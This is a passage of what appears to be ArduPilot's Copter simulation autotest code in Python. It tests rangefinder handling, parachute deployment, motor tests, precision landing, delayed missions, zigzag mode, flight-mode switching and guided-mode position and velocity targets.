"rangefinder/global position int mismatch %0.2f vs %0.2f" %
(m_r.distance, m_p.relative_alt/1000))
self.land_and_disarm()
if not self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("Did not see expected RFND message")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_terrain_spline_mission(self):
self.set_parameter("AUTO_OPTIONS", 3)
self.set_parameter("TERRAIN_ENABLE", 0)
self.load_mission("wp.txt")
self.change_mode('AUTO')
self.wait_ready_to_arm()
self.arm_vehicle()
self.wait_waypoint(4, 4)
self.wait_disarmed()
def test_surface_tracking(self):
ex = None
self.context_push()
# we must start mavproxy here as otherwise we can't get the
# terrain database tiles - this leads to random failures in
# CI!
mavproxy = self.start_mavproxy()
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("RC9_OPTION", 10) # rangefinder
self.set_rc(9, 2000)
self.reboot_sitl() # needed for both rangefinder and initial position
self.assert_vehicle_location_is_at_startup_location()
self.takeoff(10, mode="LOITER")
lower_surface_pos = mavutil.location(-35.362421, 149.164534, 584, 270)
here = self.mav.location()
bearing = self.get_bearing(here, lower_surface_pos)
self.change_mode("GUIDED")
self.guided_achieve_heading(bearing)
self.change_mode("LOITER")
self.delay_sim_time(2)
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
orig_absolute_alt_mm = m.alt
self.progress("Original alt: absolute=%f" % orig_absolute_alt_mm)
self.progress("Flying somewhere which surface is known lower compared to takeoff point")
self.set_rc(2, 1450)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 200:
raise NotAchievedException("Did not reach lower point")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
x = mavutil.location(m.lat/1e7, m.lon/1e7, m.alt/1e3, 0)
dist = self.get_distance(x, lower_surface_pos)
delta = (orig_absolute_alt_mm - m.alt)/1000.0
self.progress("Distance: %fm abs-alt-delta: %fm" %
(dist, delta))
if dist < 15:
if delta < 0.8:
raise NotAchievedException("Did not dip in altitude as expected")
break
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
self.disarm_vehicle(force=True)
ex = e
self.stop_mavproxy(mavproxy)
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_rangefinder_switchover(self):
"""test that the EKF correctly handles the switchover between baro and rangefinder"""
ex = None
self.context_push()
try:
self.set_analog_rangefinder_parameters()
self.set_parameters({
"RNGFND1_MAX_CM": 1500
})
# configure EKF to use rangefinder for altitude at low altitudes
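            # EKx_RNG_USE_HGT is a percentage of the rangefinder's
            # maximum range: 70% of the 15m RNGFND1_MAX_CM set above,
            # so the EKF uses the rangefinder below roughly 10.5m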
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_RNG_USE_HGT", 70)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_RNG_USE_HGT", 70)
self.reboot_sitl() # needed for both rangefinder and initial position
self.assert_vehicle_location_is_at_startup_location()
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(3, 1800)
self.set_rc(2, 1200)
# wait till we get to 50m
self.wait_altitude(50, 52, True, 60)
self.change_mode("RTL")
# wait till we get to 25m
self.wait_altitude(25, 27, True, 120)
# level up
self.set_rc(2, 1500)
self.wait_altitude(14, 15, relative=True)
self.wait_rtl_complete()
except Exception as e:
self.print_exception_caught(e)
self.disarm_vehicle(force=True)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_parachute(self):
self.set_rc(9, 1000)
self.set_parameter("CHUTE_ENABLED", 1)
self.set_parameter("CHUTE_TYPE", 10)
self.set_parameter("SERVO9_FUNCTION", 27)
self.set_parameter("SIM_PARA_ENABLE", 1)
self.set_parameter("SIM_PARA_PIN", 9)
self.progress("Test triggering parachute in mission")
self.load_mission("copter_parachute_mission.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1600)
self.wait_statustext('BANG', timeout=60)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("Test triggering with mavlink message")
self.takeoff(20)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_PARACHUTE,
2, # release
0,
0,
0,
0,
0,
0)
self.wait_statustext('BANG', timeout=60)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("Testing three-position switch")
self.set_parameter("RC9_OPTION", 23) # parachute 3pos
self.progress("Test manual triggering")
self.takeoff(20)
self.set_rc(9, 2000)
self.wait_statustext('BANG', timeout=60)
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_push()
self.progress("Crashing with 3pos switch in enable position")
self.takeoff(40)
self.set_rc(9, 1500)
self.set_parameter("SIM_ENGINE_MUL", 0)
self.set_parameter("SIM_ENGINE_FAIL", 1)
self.wait_statustext('BANG', timeout=60)
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.progress("Crashing with 3pos switch in disable position")
loiter_alt = 10
self.takeoff(loiter_alt, mode='LOITER')
self.set_rc(9, 1100)
self.set_parameter("SIM_ENGINE_MUL", 0)
self.set_parameter("SIM_ENGINE_FAIL", 1)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + 5:
m = self.mav.recv_match(type='STATUSTEXT', blocking=True, timeout=1)
if m is None:
continue
if "BANG" in m.text:
self.set_rc(9, 1000)
self.reboot_sitl()
raise NotAchievedException("Parachute deployed when disabled")
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
def test_motortest(self, timeout=60):
self.start_subtest("Testing PWM output")
pwm_in = 1300
        # the default frame is "+" - motor-test motor 2 is "B", which
        # is servo output 1... see
        # https://ardupilot.org/copter/docs/connect-escs-and-motors.html
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOTOR_TEST,
2, # start motor
mavutil.mavlink.MOTOR_TEST_THROTTLE_PWM,
pwm_in, # pwm-to-output
2, # timeout in seconds
2, # number of motors to output
0, # compass learning
0,
timeout=timeout)
# long timeouts here because there's a pause before we start motors
self.wait_servo_channel_value(1, pwm_in, timeout=10)
self.wait_servo_channel_value(4, pwm_in, timeout=10)
self.wait_statustext("finished motor test")
self.end_subtest("Testing PWM output")
self.start_subtest("Testing percentage output")
percentage = 90.1
# since MOT_SPIN_MIN and MOT_SPIN_MAX are not set, the RC3
# min/max are used.
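        # e.g. with the default RC3_MIN=1100/RC3_MAX=1900 (assumed
        # defaults) this gives 1000 + 800 * 0.901 ~= 1720.8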
expected_pwm = 1000 + (self.get_parameter("RC3_MAX") - self.get_parameter("RC3_MIN")) * percentage/100.0
self.progress("expected pwm=%f" % expected_pwm)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOTOR_TEST,
2, # start motor
mavutil.mavlink.MOTOR_TEST_THROTTLE_PERCENT,
percentage, # pwm-to-output
2, # timeout in seconds
2, # number of motors to output
0, # compass learning
0,
timeout=timeout)
self.wait_servo_channel_value(1, expected_pwm, timeout=10)
self.wait_servo_channel_value(4, expected_pwm, timeout=10)
self.wait_statustext("finished motor test")
self.end_subtest("Testing percentage output")
def fly_precision_sitl(self):
"""Use SITL PrecLand backend precision messages to land aircraft."""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
self.set_parameter("PLND_TYPE", 4)
self.set_analog_rangefinder_parameters()
self.set_parameter("SIM_SONAR_SCALE", 12)
start = self.mav.location()
target = start
(target.lat, target.lng) = mavextra.gps_offset(start.lat, start.lng, 4, -4)
self.progress("Setting target to %f %f" % (target.lat, target.lng))
self.set_parameter("SIM_PLD_ENABLE", 1)
self.set_parameter("SIM_PLD_LAT", target.lat)
self.set_parameter("SIM_PLD_LON", target.lng)
self.set_parameter("SIM_PLD_HEIGHT", 0)
self.set_parameter("SIM_PLD_ALT_LMT", 15)
self.set_parameter("SIM_PLD_DIST_LMT", 10)
self.reboot_sitl()
self.progress("Waiting for location")
self.zero_throttle()
self.takeoff(10, 1800)
self.change_mode("LAND")
self.wait_landed_and_disarmed()
self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
new_pos = self.mav.location()
delta = self.get_distance(target, new_pos)
self.progress("Landed %f metres from target position" % delta)
max_delta = 1
if delta > max_delta:
raise NotAchievedException("Did not land close enough to target position (%fm > %fm" % (delta, max_delta))
if not self.current_onboard_log_contains_message("PL"):
raise NotAchievedException("Did not see expected PL message")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.zero_throttle()
self.context_pop()
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def get_system_clock_utc(self, time_seconds):
# this is a copy of ArduPilot's AP_RTC function!
        # separate time into ms, sec, min and hour, all expressed
        # in milliseconds
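        # e.g. time_seconds=3723.5 (01:02:03.5) gives ms=500,
        # sec_ms=3000, min_ms=120000, hour_ms=3600000, returning
        # (1, 2, 3, 0)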
time_ms = time_seconds * 1000
ms = time_ms % 1000
sec_ms = (time_ms % (60 * 1000)) - ms
min_ms = (time_ms % (60 * 60 * 1000)) - sec_ms - ms
hour_ms = (time_ms % (24 * 60 * 60 * 1000)) - min_ms - sec_ms - ms
# convert times as milliseconds into appropriate units
secs = sec_ms / 1000
mins = min_ms / (60 * 1000)
hours = hour_ms / (60 * 60 * 1000)
return (hours, mins, secs, 0)
def calc_delay(self, seconds, delay_for_seconds):
# delay-for-seconds has to be long enough that we're at the
# waypoint before that time. Otherwise we'll try to wait a
# day....
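        # e.g. now=10h 59m 50s plus 17s rolls over to 11h 0m 7s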
if delay_for_seconds >= 3600:
raise ValueError("Won't handle large delays")
(hours,
mins,
secs,
ms) = self.get_system_clock_utc(seconds)
self.progress("Now is %uh %um %us" % (hours, mins, secs))
        secs += delay_for_seconds # add the requested delay
mins += int(secs/60)
secs %= 60
hours += int(mins / 60)
mins %= 60
if hours > 24:
raise ValueError("Way too big a delay")
self.progress("Delay until %uh %um %us" %
(hours, mins, secs))
return (hours, mins, secs, 0)
def reset_delay_item(self, seq, seconds_in_future):
frame = mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT
command = mavutil.mavlink.MAV_CMD_NAV_DELAY
# retrieve mission item and check it:
tried_set = False
hours = None
mins = None
secs = None
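        # loop: read the item back, and if it does not yet hold the
        # absolute-time delay we want, push a replacement via the
        # partial-write handshake until the readback matches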
while True:
self.progress("Requesting item")
self.mav.mav.mission_request_send(1,
1,
seq)
st = self.mav.recv_match(type='MISSION_ITEM',
blocking=True,
timeout=1)
if st is None:
continue
print("Item: %s" % str(st))
have_match = (tried_set and
st.seq == seq and
st.command == command and
st.param2 == hours and
st.param3 == mins and
st.param4 == secs)
if have_match:
return
self.progress("Mission mismatch")
m = None
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 3:
raise NotAchievedException(
"Did not receive MISSION_REQUEST")
self.mav.mav.mission_write_partial_list_send(1,
1,
seq,
seq)
m = self.mav.recv_match(type='MISSION_REQUEST',
blocking=True,
timeout=1)
if m is None:
continue
if m.seq != st.seq:
continue
break
self.progress("Sending absolute-time mission item")
# we have to change out the delay time...
now = self.mav.messages["SYSTEM_TIME"]
if now is None:
raise PreconditionFailedException("Never got SYSTEM_TIME")
if now.time_unix_usec == 0:
raise PreconditionFailedException("system time is zero")
(hours, mins, secs, ms) = self.calc_delay(now.time_unix_usec/1000000, seconds_in_future)
self.mav.mav.mission_item_send(
1, # target system
1, # target component
seq, # seq
frame, # frame
command, # command
0, # current
1, # autocontinue
0, # p1 (relative seconds)
hours, # p2
mins, # p3
secs, # p4
0, # p5
0, # p6
0) # p7
tried_set = True
ack = self.mav.recv_match(type='MISSION_ACK',
blocking=True,
timeout=1)
self.progress("Received ack: %s" % str(ack))
def fly_nav_delay_abstime(self):
"""fly a simple mission that has a delay in it"""
self.fly_nav_delay_abstime_x(87)
def fly_nav_delay_abstime_x(self, delay_for, expected_delay=None):
"""fly a simple mission that has a delay in it, expect a delay"""
if expected_delay is None:
expected_delay = delay_for
self.load_mission("copter_nav_delay.txt")
self.change_mode("LOITER")
self.wait_ready_to_arm()
delay_item_seq = 3
self.reset_delay_item(delay_item_seq, delay_for)
delay_for_seconds = delay_for
reset_at_m = self.mav.recv_match(type='SYSTEM_TIME', blocking=True)
reset_at = reset_at_m.time_unix_usec/1000000
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
count_stop = -1
tstart = self.get_sim_time()
while self.armed(): # we RTL at end of mission
now = self.get_sim_time_cached()
if now - tstart > 240:
raise AutoTestTimeoutException("Did not disarm as expected")
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
at_delay_item = ""
if m.seq == delay_item_seq:
at_delay_item = "(delay item)"
self.progress("MISSION_CURRENT.seq=%u %s" % (m.seq, at_delay_item))
if m.seq > delay_item_seq:
if count_stop == -1:
count_stop_m = self.mav.recv_match(type='SYSTEM_TIME',
blocking=True)
count_stop = count_stop_m.time_unix_usec/1000000
calculated_delay = count_stop - reset_at
error = abs(calculated_delay - expected_delay)
self.progress("Stopped for %u seconds (want >=%u seconds)" %
(calculated_delay, delay_for_seconds))
if error > 2:
raise NotAchievedException("delay outside expectations")
def fly_nav_takeoff_delay_abstime(self):
"""make sure taking off at a specific time works"""
self.load_mission("copter_nav_delay_takeoff.txt")
self.change_mode("LOITER")
self.wait_ready_to_arm()
delay_item_seq = 2
delay_for_seconds = 77
self.reset_delay_item(delay_item_seq, delay_for_seconds)
reset_at = self.get_sim_time_cached()
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
        # should not take off for at least 77 seconds
tstart = self.get_sim_time()
took_off = False
while self.armed():
now = self.get_sim_time_cached()
if now - tstart > 200:
# timeout
break
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
now = self.get_sim_time_cached()
self.progress("%s" % str(m))
if m.seq > delay_item_seq:
if not took_off:
took_off = True
delta_time = now - reset_at
if abs(delta_time - delay_for_seconds) > 2:
raise NotAchievedException((
"Did not take off on time "
"measured=%f want=%f" %
(delta_time, delay_for_seconds)))
if not took_off:
raise NotAchievedException("Did not take off")
def fly_zigzag_mode(self):
'''test zigzag mode'''
# set channel 8 for zigzag savewp and recentre it
self.set_parameter("RC8_OPTION", 61)
self.takeoff(alt_min=5, mode='LOITER')
ZIGZAG = 24
j = 0
slowdown_speed = 0.3 # because Copter takes a long time to actually stop
self.start_subtest("Conduct ZigZag test for all 4 directions")
while j < 4:
self.progress("## Align heading with the run-way (j=%d)##" % j)
self.set_rc(8, 1500)
self.set_rc(4, 1420)
self.wait_heading(352-j*90)
self.set_rc(4, 1500)
self.change_mode(ZIGZAG)
self.progress("## Record Point A ##")
self.set_rc(8, 1100) # record point A
self.set_rc(1, 1700) # fly side-way for 20m
self.wait_distance(20)
self.set_rc(1, 1500)
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## Record Point A ##")
self.set_rc(8, 1500) # pilot always have to cross mid position when changing for low to high position
self.set_rc(8, 1900) # record point B
i = 1
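            # this loop currently runs a single iteration (i == 1 only)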
while i < 2:
self.start_subtest("Run zigzag A->B and B->A (i=%d)" % i)
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300)
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector BA ##")
self.set_rc(8, 1100)
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300) # fly forward for 10 meter
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector AB ##")
self.set_rc(8, 1900)
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
i = i + 1
# test the case when pilot switch to manual control during the auto flight
self.start_subtest("test the case when pilot switch to manual control during the auto flight")
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300) # fly forward for 10 meter
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
            self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector BA ##")
self.set_rc(8, 1100) # switch to low position, auto execute vector BA
self.wait_distance(8) # purposely switch to manual halfway
self.set_rc(8, 1500)
self.wait_groundspeed(0, slowdown_speed) # copter should slow down here
self.progress("## Manual control to fly forward ##")
self.set_rc(2, 1300) # manual control to fly forward
self.wait_distance(8)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## continue vector BA ##")
self.set_rc(8, 1100) # copter should continue mission here
self.wait_distance(8) # wait for it to finish rest of BA
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector AB ##")
self.set_rc(8, 1900) # switch to execute AB again
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.change_mode('LOITER')
j = j + 1
self.do_RTL()
def test_setting_modes_via_modeswitch(self):
self.context_push()
ex = None
try:
fltmode_ch = 5
self.set_parameter("FLTMODE_CH", fltmode_ch)
self.set_rc(fltmode_ch, 1000) # PWM for mode1
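            # each PWM value below sits inside one of the six
            # mode-switch bands (roughly <=1230, 1231-1360, 1361-1490,
            # 1491-1620, 1621-1749, >=1750)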
testmodes = [("FLTMODE1", 4, "GUIDED", 1165),
("FLTMODE2", 13, "SPORT", 1295),
("FLTMODE3", 6, "RTL", 1425),
("FLTMODE4", 7, "CIRCLE", 1555),
("FLTMODE5", 1, "ACRO", 1685),
("FLTMODE6", 17, "BRAKE", 1815),
]
for mode in testmodes:
(parm, parm_value, name, pwm) = mode
self.set_parameter(parm, parm_value)
for mode in reversed(testmodes):
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
for mode in testmodes:
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
for mode in reversed(testmodes):
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_setting_modes_via_auxswitch(self):
self.context_push()
ex = None
try:
fltmode_ch = int(self.get_parameter("FLTMODE_CH"))
self.set_rc(fltmode_ch, 1000)
self.wait_mode("CIRCLE")
self.set_rc(9, 1000)
self.set_rc(10, 1000)
self.set_parameter("RC9_OPTION", 18) # land
self.set_parameter("RC10_OPTION", 55) # guided
self.set_rc(9, 1900)
self.wait_mode("LAND")
self.set_rc(10, 1900)
self.wait_mode("GUIDED")
self.set_rc(10, 1000) # this re-polls the mode switch
self.wait_mode("CIRCLE")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def fly_guided_stop(self,
timeout=20,
groundspeed_tolerance=0.05,
climb_tolerance=0.01):
"""stop the vehicle moving in guided mode"""
self.progress("Stopping vehicle")
tstart = self.get_sim_time()
# send a position-control command
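        # type_mask bits are *ignore* flags: 0b1111111111111000 sets
        # everything except the three position bits, so only x/y/z
        # below are honoured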
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_BODY_NED,
0b1111111111111000, # mask specifying use-only-x-y-z
0, # x
0, # y
0, # z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Vehicle did not stop")
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
print("%s" % str(m))
if (m.groundspeed < groundspeed_tolerance and
m.climb < climb_tolerance):
break
def fly_guided_move_global_relative_alt(self, lat, lon, alt):
startpos = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
self.mav.mav.set_position_target_global_int_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT,
0b1111111111111000, # mask specifying use-only-lat-lon-alt
lat, # lat
lon, # lon
alt, # alt
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 200:
raise NotAchievedException("Did not move far enough")
# send a position-control command
pos = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
delta = self.get_distance_int(startpos, pos)
self.progress("delta=%f (want >10)" % delta)
if delta > 10:
break
def fly_guided_move_local(self, x, y, z_up, timeout=100):
"""move the vehicle using MAVLINK_MSG_ID_SET_POSITION_TARGET_LOCAL_NED"""
startpos = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
self.progress("startpos=%s" % str(startpos))
tstart = self.get_sim_time()
# send a position-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111111000, # mask specifying use-only-x-y-z
x, # x
y, # y
-z_up,# z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not start to move")
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
print("%s" % m)
if m.groundspeed > 0.5:
break
self.progress("Waiting for vehicle to stop...")
self.wait_groundspeed(1, 100, timeout=timeout)
stoppos = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
self.progress("stop_pos=%s" % str(stoppos))
x_achieved = stoppos.x - startpos.x
if x_achieved - x > 1:
raise NotAchievedException("Did not achieve x position: want=%f got=%f" % (x, x_achieved))
y_achieved = stoppos.y - startpos.y
if y_achieved - y > 1:
raise NotAchievedException("Did not achieve y position: want=%f got=%f" % (y, y_achieved))
z_achieved = stoppos.z - startpos.z
if z_achieved - z_up > 1:
raise NotAchievedException("Did not achieve z position: want=%f got=%f" % (z_up, z_achieved))
def test_guided_local_position_target(self, x, y, z_up):
""" Check target position being received by vehicle """
# set POSITION_TARGET_LOCAL_NED message rate using SET_MESSAGE_INTERVAL
self.progress("Setting local target in NED: (%f, %f, %f)" % (x, y, -z_up))
self.progress("Setting rate to 1 Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 1)
# set position target
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111111000, # mask specifying use only xyz
x, # x
y, # y
-z_up, # z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=2)
self.progress("Received local target: %s" % str(m))
if not (m.type_mask == 0xFFF8 or m.type_mask == 0x0FF8):
raise NotAchievedException("Did not receive proper mask: expected=65528 or 4088, got=%u" % m.type_mask)
        if abs(x - m.x) > 0.1:
            raise NotAchievedException("Did not receive proper target position x: wanted=%f got=%f" % (x, m.x))
        if abs(y - m.y) > 0.1:
            raise NotAchievedException("Did not receive proper target position y: wanted=%f got=%f" % (y, m.y))
        if abs(z_up - (-m.z)) > 0.1:
            raise NotAchievedException("Did not receive proper target position z: wanted=%f got=%f" % (z_up, -m.z))
def test_guided_local_velocity_target(self, vx, vy, vz_up, timeout=3):
" Check local target velocity being recieved by vehicle "
self.progress("Setting local NED velocity target: (%f, %f, %f)" % (vx, vy, -vz_up))
self.progress("Setting POSITION_TARGET_LOCAL_NED message rate to 10Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 10)
# Drain old messages and ignore the ramp-up to the required target velocity
tstart = self.get_sim_time()
while self.get_sim_time_cached() - tstart < timeout:
# send velocity-control command
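            # mask 0b1111111111000111 ignores position, acceleration
            # and yaw fields, honouring only vx/vy/vz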
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111000111, # mask specifying use only vx,vy,vz
0, # x
0, # y
0, # z
vx, # vx
vy, # vy
-vz_up, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=1)
if m is None:
raise NotAchievedException("Did not receive any message for 1 sec")
self.progress("Received local target: %s" % str(m))
# Check the last received message
if not (m.type_mask == 0xFFC7 or m.type_mask == 0x0FC7):
raise NotAchievedException("Did not receive proper mask: expected=65479 or 4039, got=%u" % m.type_mask)
if vx - m.vx > 0.1:
raise NotAchievedException("Did not receive proper target velocity vx: wanted=%f got=%f" % (vx, m.vx))
if vy - m.vy > 0.1:
raise NotAchievedException("Did not receive proper target velocity vy: wanted=%f got=%f" % (vy, m.vy))
if vz_up - (-m.vz) > 0.1:
raise NotAchievedException("Did not receive proper target velocity vz: wanted=%f got=%f" % (vz_up, -m.vz))
self.progress("Received proper target velocity commands")
def test_position_target_message_mode(self):
" Ensure that POSITION_TARGET_LOCAL_NED messages are sent in Guided Mode only "
self.hover()
self.change_mode('LOITER')
self.progress("Setting POSITION_TARGET_LOCAL_NED message rate to 10Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 10)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + 5:
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=1)
if m is None:
continue
raise NotAchievedException("Received POSITION_TARGET message in LOITER mode: %s" % str(m))
self.progress("Did not receive any POSITION_TARGET_LOCAL_NED message in LOITER mode. Success")
def earth_to_body(self, vector):
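        # rotate an earth-frame vector into the body frame using the
        # inverse of the current attitude rotation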
r = mavextra.rotation(self.mav.messages["ATTITUDE"]).invert()
# print("r=%s" % str(r))
return r * vector
def loiter_to_ne(self, x, y, z, timeout=40):
'''loiter to x, y, z from origin (in metres), z is *up*'''
dest_ned = rotmat.Vector3(x, y, -z)
tstart = self.get_sim_time()
success_start = -1
while True:
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException("Did not loiter to ne!")
m_pos = self.mav.recv_match(type='LOCAL_POSITION_NED',
blocking=True)
pos_ned = rotmat.Vector3(m_pos.x, m_pos.y, m_pos.z)
# print("dest_ned=%s" % str(dest_ned))
# print("pos_ned=%s" % str(pos_ned))
delta_ef = dest_ned - pos_ned
# print("delta_ef=%s" % str(delta_ef))
# determine if we've successfully navigated to close to
# where we should be:
dist = math.sqrt(delta_ef.x * delta_ef.x + delta_ef.y * delta_ef.y)
dist_max = 0.1
self.progress("dist=%f want <%f" % (dist, dist_max))
if dist < dist_max:
# success! We've gotten within our target distance
if success_start == -1:
success_start = now
elif now - success_start > 10:
self.progress("Yay!")
break
else:
success_start = -1
delta_bf = self.earth_to_body(delta_ef)
# print("delta_bf=%s" % str(delta_bf))
angle_x = math.atan2(delta_bf.y, delta_bf.z)
angle_y = -math.atan2(delta_bf.x, delta_bf.z)
distance = math.sqrt(delta_bf.x * delta_bf.x +
delta_bf.y * delta_bf.y +
delta_bf.z * delta_bf.z)
# att = self.mav.messages["ATTITUDE"]
# print("r=%f p=%f y=%f" % (math.degrees(att.roll), math.degrees(att.pitch), math.degrees(att.yaw)))
# print("angle_x=%s angle_y=%s" % (str(math.degrees(angle_x)), str(math.degrees(angle_y))))
# print("distance=%s" % str(distance))
self.mav.mav.landing_target_send(
0, # time_usec
1, # target_num
mavutil.mavlink.MAV_FRAME_GLOBAL, # frame; AP ignores
angle_x, # angle x (radians)
angle_y, # angle y (radians)
distance, # distance to target
0.01, # size of target in radians, X-axis
0.01 # size of target in radians, Y-axis
)
def fly_payload_place_mission(self):
"""Test payload placing in auto."""
self.context_push()
ex = None
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("GRIP_ENABLE", 1)
self.set_parameter("GRIP_TYPE", 1)
self.set_parameter("SIM_GRPS_ENABLE", 1)
self.set_parameter("SIM_GRPS_PIN", 8)
self.set_parameter("SERVO8_FUNCTION", 28)
self.set_parameter("RC9_OPTION", 19)
self.reboot_sitl()
self.set_rc(9, 2000)
# load the mission:
self.load_mission("copter_payload_place.txt")
self.progress("Waiting for location")
self.mav.location()
self.zero_throttle()
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_text("Gripper load releas", timeout=90)
self.wait_disarmed()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
    def fly_guided_change_submode(self):
        """Ensure we can move around in guided after a takeoff command."""
        # start by disabling GCS failsafe, otherwise we immediately
        # disarm due to (apparently) not receiving traffic from the
        # GCS for too long.  This is probably a function of --speedup
self.set_parameter("FS_GCS_ENABLE", 0)
self.set_parameter("DISARM_DELAY", 0) # until traffic problems are fixed
self.change_mode("GUIDED")
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff(alt_min=10)
self.start_subtest("yaw through absolute angles using MAV_CMD_CONDITION_YAW")
self.guided_achieve_heading(45)
self.guided_achieve_heading(135)
